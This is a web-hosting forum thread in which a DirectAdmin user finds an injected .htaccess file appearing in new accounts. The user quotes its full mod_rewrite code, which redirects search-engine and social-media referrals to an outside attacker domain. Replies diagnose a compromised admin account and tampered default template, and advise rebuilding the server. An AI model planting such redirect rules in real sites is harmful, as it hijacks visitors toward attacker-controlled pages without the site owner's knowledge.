unknown .htaccess file

[argaios]

Hi,

after creation of new user da creates unknown .htaccess file and it contents like that :

#b58b6f#
<IfModule mod_rewrite.c>^M
RewriteEngine On^M
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)^M
RewriteRule ^(.*)$ [url]http://rec-creations.com/adv.php[/url] [R=301,L]^M
</IfModule>
#/b58b6f#

how can i fix it.

 

[ditto]

To me it looks like your server is hacked. The .htaccess code seems to redirect all visitors that is coming from a search eninge to the hackers site, only when you visit the domain manually, you will not be redirected. You should hire a security expert.

 

[argaios]

there are no .htaccess file on old domains. but when i create new user or new domain direktadmin addes this .htaccess file.this file has not added manually. this process happens automaticly. there must be somewhere where i can change and fix it on direktadmin.

 

[ditto]

Yes, but I still think your server is hacked. I would guess that somebody has your DirectAdmin "admin" user password. That person would then add this .htaccess to /home/admin/domains/default/.htaccess - that way it would be added to all new accounts. DirectAdmin does not do this, therfor somebody has done it, I if it is not you, then your server is probably compromised.

 

[argaios]

You are absolutly right about we were hacked. But I am trying to understand how they automated this process. Default domain accouns has been changed. Thanks for your help.

 

[zEitEr]

Check

/home/admin/domains/default/
/home/<reseller>/domains/default/
/usr/local/directadmin/scripts/custom/

 

[nobaloney]

You are absolutly right about we were hacked. But I am trying to understand how they automated this process.

They didn't automate the process. They simply put an .htaccess file into your default setup, which DirectAdmin uses when it creates a new domain.

Unless you know who did it (and even if you do) you can't guarantee they didn't get root access to your server. And you don't know what else they may have done. Best practices would be to rebuild the server.

Jeff